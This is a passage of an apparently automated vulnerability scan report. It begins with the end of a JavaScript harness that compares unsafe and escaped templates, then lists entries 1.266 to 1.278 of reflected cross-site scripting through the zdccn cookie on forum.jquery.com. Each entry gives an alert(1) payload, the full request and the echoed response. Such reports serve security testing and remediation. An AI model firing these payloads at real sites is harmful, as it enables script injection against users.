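if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, render] of [['unsafe', renderUnsafe], ['safe', renderSafe]]) {
    console.log(label, audit(render, PAYLOAD_JS), audit(render, PAYLOAD_ATTR));
  }
  console.log('valid token?', isValidToken(TOKEN), isValidToken(PAYLOAD_JS));
}
```

With the unsafe template the JS payload fires the probe once and leaves csrfToken as NaN (the literal became "..."-alert(1)-"..."), and the attribute payload fires it from the injected script that runs before the real one. With the safe template neither payload fires, and both the attribute and the literal decode back to the exact cookie value. The hex escaping in encodeJsString is deliberately broader than escaping quotes alone: it also covers the "</script>" in the attribute-context payload, which would otherwise end the script block early regardless of how the string literal was quoted. The UUID check should run first; the encoders are the second line of defence for the case where the value has to be echoed at all.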

1.266. http://forum.jquery.com/jquery-mobile [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-mobile

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b65d"><script>alert(1)</script>760f29b715b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb7b65d"><script>alert(1)</script>760f29b715b;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=05D688205BB60284C4BFE675C84FCB0F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:36 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb7b65d"><script>alert(1)</script>760f29b715b"/>
...[SNIP]...

1.267. http://forum.jquery.com/portalLogin.do [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /portalLogin.do

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c08"-alert(1)-"b866f31e11f was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /portalLogin.do?serviceurl=/&forumGroupUrl=jquery HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb76c08"-alert(1)-"b866f31e11f;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:17:21 GMT
Server: Apache-Coyote/1.1
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

Login Pag
...[SNIP]...
if(typeof postToForum != "undefined")
{
options.postToForum = postToForum;
}
options["zdrpn"] = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb76c08"-alert(1)-"b866f31e11f";
$.ajax(
{
url: "/sendFeedback.do",
type: "POST",
data: options,
error: function (err,
...[SNIP]...

1.268. http://forum.jquery.com/qunit-and-testing [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /qunit-and-testing

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c6a"-alert(1)-"44a5be9428e was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qunit-and-testing HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbf9c6a"-alert(1)-"44a5be9428e;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D176721E9DB119D707310F040EFB1B5E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:51 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbf9c6a"-alert(1)-"44a5be9428e";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.269. http://forum.jquery.com/qunit-and-testing [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /qunit-and-testing

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 859be"><script>alert(1)</script>42f5fe768cd was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /qunit-and-testing HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb859be"><script>alert(1)</script>42f5fe768cd;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=215B49D7DC19D8441A74BAF74BF9C016; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:11 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb859be"><script>alert(1)</script>42f5fe768cd"/>
...[SNIP]...

1.270. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/how-can-i-help-9-5-2010

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd65c"><script>alert(1)</script>bcb118b7181 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /topic/how-can-i-help-9-5-2010 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbfd65c"><script>alert(1)</script>bcb118b7181;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D17F2CB77FD5EEB8B8B71A24DB538F05; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:06 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbfd65c"><script>alert(1)</script>bcb118b7181"/>
...[SNIP]...

1.271. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/how-can-i-help-9-5-2010

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28b38"-alert(1)-"168f0cab024 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/how-can-i-help-9-5-2010 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb28b38"-alert(1)-"168f0cab024;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7DDB9118B4CBB89DC25B609C9374DB48; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:29 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb28b38"-alert(1)-"168f0cab024";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.272. http://forum.jquery.com/topic/looking-for-help-on-panel-development [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/looking-for-help-on-panel-development

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 263d3"-alert(1)-"00a9a98b334 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/looking-for-help-on-panel-development HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb263d3"-alert(1)-"00a9a98b334;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C038A38CA89AB45BA7F31672274A9BAB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb263d3"-alert(1)-"00a9a98b334";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.273. http://forum.jquery.com/topic/looking-for-help-on-panel-development [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/looking-for-help-on-panel-development

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3614e"><script>alert(1)</script>86359096cc2 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /topic/looking-for-help-on-panel-development HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb3614e"><script>alert(1)</script>86359096cc2;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=398712AD684CA524C52F4C109C44C26E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:01 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb3614e"><script>alert(1)</script>86359096cc2"/>
...[SNIP]...

1.274. http://forum.jquery.com/user/andrew_powell [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/andrew_powell

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c13"><script>alert(1)</script>fe4dc260b4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/andrew_powell HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb49c13"><script>alert(1)</script>fe4dc260b4;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=F72C626CD040A5191DDDB2DFF045B372; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:43 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb49c13"><script>alert(1)</script>fe4dc260b4"/>
...[SNIP]...

1.275. http://forum.jquery.com/user/andrew_powell [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/andrew_powell

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6d2b"-alert(1)-"c7e0806c31b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/andrew_powell HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbc6d2b"-alert(1)-"c7e0806c31b;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=88E89C4B3C3D2D87AADFC85DB4FF8C0E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:45 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbc6d2b"-alert(1)-"c7e0806c31b";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.276. http://forum.jquery.com/user/charlietfl [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/charlietfl

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fbcc"-alert(1)-"86f865f8e09 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/charlietfl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb1fbcc"-alert(1)-"86f865f8e09;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C89F73911CAFCEDA5CA47373F30BAE02; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb1fbcc"-alert(1)-"86f865f8e09";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.277. http://forum.jquery.com/user/charlietfl [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/charlietfl

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a005"><script>alert(1)</script>e468869eafa was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/charlietfl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb1a005"><script>alert(1)</script>e468869eafa;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=CC7F9CB9130F201958A5C10D6A0CF390; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:37 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb1a005"><script>alert(1)</script>e468869eafa"/>
...[SNIP]...

1.278. http://forum.jquery.com/user/christophe [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/christophe

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b6d"-alert(1)-"cdf3c757657 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/christophe HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb21b6d"-alert(1)-"cdf3c757657;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E1BE041113D88A547B7173A211036D07; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:11 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb21b6d"-alert(1)-"cdf3c757657";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

